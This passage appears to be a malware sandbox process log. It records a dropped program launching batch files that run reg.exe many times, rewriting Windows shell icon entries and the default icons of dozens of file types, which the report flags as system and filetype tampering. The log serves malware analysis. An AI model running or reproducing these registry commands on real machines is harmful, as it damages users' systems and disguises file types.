        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 78 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4492
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 79 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 80 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 81 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3560
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 82 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3020
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 83 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5388
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 84 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6000
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 85 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 86 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5652
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 87 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 88 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2252
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 89 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3400
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 90 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:1612
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 91 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5580
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 92 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5196
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 93 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1428
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 94 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1428
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 95 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5988
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 96 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 97 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5832
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 98 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 99 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5728
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 100 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5488
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 101 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 102 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4636
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 103 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5728
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 104 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 105 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 106 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5776
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 107 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 108 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 109 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5364
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 110 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6084
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 111 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4012
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 112 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2840
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 113 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5776
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 114 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 115 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5172
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 116 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5124
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 117 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:6084
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 118 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5908
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 119 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5372
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 120 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 121 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5124
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 122 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 123 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2840
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 124 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 125 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5704
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 126 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5512
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 127 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 128 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5208
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 129 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5668
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 130 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 131 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5096
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 132 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 133 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 134 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3688
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 135 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 136 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:480
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 137 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4208
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 138 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2376
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 139 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5236
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 140 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5704
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 141 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5040
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 142 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2788
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 143 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5620
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 144 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:952
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 145 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 146 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3352
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 147 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3688
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 148 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5244
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 149 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5308
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 150 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4836
        
        C:\java\protection\start\starticons.exe
        
        C:\java\protection\start\starticons.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3412
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DCA4.tmp\DCA5.tmp\DCA6.bat C:\java\protection\start\starticons.exe"
        9⤵
        
        PID:5280
        
        C:\java\protection\icons.exe
        
        C:\java\protection\icons.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5508
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DF73.tmp\DF74.tmp\DF75.bat C:\java\protection\icons.exe"
        11⤵
        
        PID:5652
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies system executable filetype association
        Modifies registry class
        
        PID:6012
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:804
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\batfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies system executable filetype association
        
        PID:2112
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\blendfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:6012
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\dllfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5436
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\AutoHotkeyScript\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:2412
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\pngfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:5396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\jpegfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:6012
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\giffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:5460
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\bittorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:340
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\cmdfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:4828
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\dbfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:5208
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Drive\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:2948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\DVD\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\docxfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:5448
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:3712
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\http\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:2036
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:5536
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Folder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:3004
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\https\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:2144
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\icofile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:5756
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\inifile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:5856
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\mscfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:2632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\ms-excel\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:3116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\ms-publisher\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:2276
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\ms-word\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:6004
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\ms-access\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:1676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\MSInfoFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:340
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Python.File\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:2788
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\regfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:4592
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\steamlink\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:3932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\steam\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\4.ico" /f
        12⤵
        Modifies registry class
        
        PID:644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\svgfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:5420
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\themefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:6068
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\themepackfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:5212
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:5748
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\xmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:1668
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\WinRAR\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:5880
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Windows.VhdFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:5036
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\SearchFolder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:6024
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:3548
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5908
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\inffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:2600
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\JSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:320
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\JSEFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:2440
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\ftp\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:5428
        
